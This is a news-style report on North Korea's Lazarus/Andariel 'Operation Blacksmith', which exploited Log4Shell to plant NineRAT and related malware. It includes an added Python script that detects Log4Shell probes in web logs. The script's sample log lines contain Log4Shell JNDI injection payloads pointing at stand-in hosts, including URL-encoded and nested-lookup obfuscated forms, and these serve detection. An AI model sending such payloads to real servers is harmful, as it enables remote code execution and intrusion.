The Lazarus Group, a North Korean state-linked threat actor, has launched a significant global campaign leveraging the Log4j vulnerability to deploy previously unknown remote access trojans (RATs). This operation, termed “Operation Blacksmith” by Cisco Talos, employs a range of malware families written in D (DLang), notably including a RAT known as NineRAT, which uses Telegram for command-and-control (C2) communications.

Cisco Talos researchers have characterized this approach as a marked evolution in the group’s tactics, aligning them with a broader sub-group known as Andariel (also referred to as Onyx Sleet or Silent Chollima). The Andariel subgroup is typically assigned roles such as initial access and long-term infiltration to support North Korean governmental objectives.

Initial access is gained by exploiting CVE-2021-44228, known as Log4Shell, on publicly accessible VMware Horizon servers. Once access is gained, NineRAT is delivered primarily to victims in sectors such as manufacturing, agriculture, and physical security.

Despite having been publicly disclosed two years prior, approximately 2.8% of applications are still utilizing vulnerable versions of Log4j. This continual exploitation underscores the pressing cybersecurity risks that businesses face, as both the Lazarus Group and other threat actors capitalize on unpatched systems.
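The two paragraphs above describe the entry vector (Log4Shell against internet-facing servers) and the reason it still works (unpatched Log4j). The following is an added detection example, not code from Cisco Talos or from the article: it scans web-server access-log lines for the JNDI lookup pattern that a Log4Shell attempt leaves behind, after undoing URL encoding and the common lookup-nesting tricks (`${lower:..}`, `${..:-..}`) that are used to disguise the string. The log lines, IP addresses and the `.invalid` hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the article). The
# ".invalid" TLD is reserved and never resolves, so the samples are inert.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2023:10:00:00 +0000] "GET /portal HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2023:10:00:01 +0000] "GET /portal HTTP/1.1" 200 512 "-" "${jndi:ldap://c2.example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2023:10:00:02 +0000] "GET /portal?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fc2.example.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.1"',
    '203.0.113.11 - - [10/Dec/2023:10:00:03 +0000] "GET / HTTP/1.1" 200 100 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://c2.example.invalid/x}"',
]

# Innermost lookups whose only effect is to hide the literal text they wrap:
#   ${lower:X} / ${upper:X}  -> case-changed X
#   ${anything:-X}           -> the default value X (key is never resolved)
_OBFUSCATION = re.compile(
    r"\$\{(?P<op>lower|upper):(?P<arg>[^${}]*)\}"
    r"|\$\{[^${}]*:-(?P<default>[^${}]*)\}"
)

# What remains after normalisation if the line carried a JNDI lookup.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Replace one disguising lookup with the text it evaluates to."""
    if match.group("op") == "lower":
        return match.group("arg").lower()
    if match.group("op") == "upper":
        return match.group("arg").upper()
    return match.group("default")


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode and peel nested disguising lookups until nothing changes.

    Bounded rounds guard against pathological input; each round resolves
    the innermost lookups, so nesting depth N needs N rounds.
    """
    for _ in range(max_rounds):
        new = _OBFUSCATION.sub(_resolve, unquote(text))
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup once de-obfuscated."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines) -> list:
    """Return (1-based line number, line) for every suspicious line."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: possible Log4Shell probe -> {normalize(hit)}")
```

A hit in an access log only shows that a probe reached the server; whether it succeeded depends on the Log4j version behind it, so findings are best paired with an inventory of `log4j-core` versions on the hosts concerned.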

Developed around May 2022, NineRAT has already been linked to attacks against a South American agricultural organization as well as a European manufacturing firm by September 2023. By harnessing a legitimate messaging service for C2 communication, the attackers aim to obscure their activities from detection.

As an operational tool, NineRAT provides attackers with a robust mechanism to execute various commands on infected systems, including gathering system information, uploading files, and performing self-upgrades. Researchers note that an activated NineRAT instance interacts with its C2 channel to further fingerprint the compromised environments.

In addition to NineRAT, a custom proxy tool named HazyLoad has been identified in the attacks; HazyLoad was previously seen in attacks exploiting a JetBrains TeamCity vulnerability (CVE-2023-42793). This tool is delivered via another malware component known as BottomLoader.

Cisco Talos has noted that DLRAT, another variant used in Operation Blacksmith, performs reconnaissance and can facilitate malware deployment while interpreting commands from its C2 infrastructure. This iterative use of various malware types further grants the Lazarus Group resilience, ensuring persistent access even if one avenue is compromised.

The repeated exploitation of Log4Shell by Andariel illustrates the versatility of this tactic, which has previously enabled the group to deploy RATs such as EarlyRat successfully. Concurrently, other North Korean factions, including the Kimsuky group, have been seen employing advanced tactics such as spear-phishing to distribute variants of malware like Amadey and RftRAT.

As businesses continue to face sophisticated cyber threats, it remains crucial for organizations to prioritize robust cybersecurity measures, particularly against the backdrop of evolving tactics employed by adversaries. Failure to properly patch known vulnerabilities could result in serious breaches and operational disruptions.
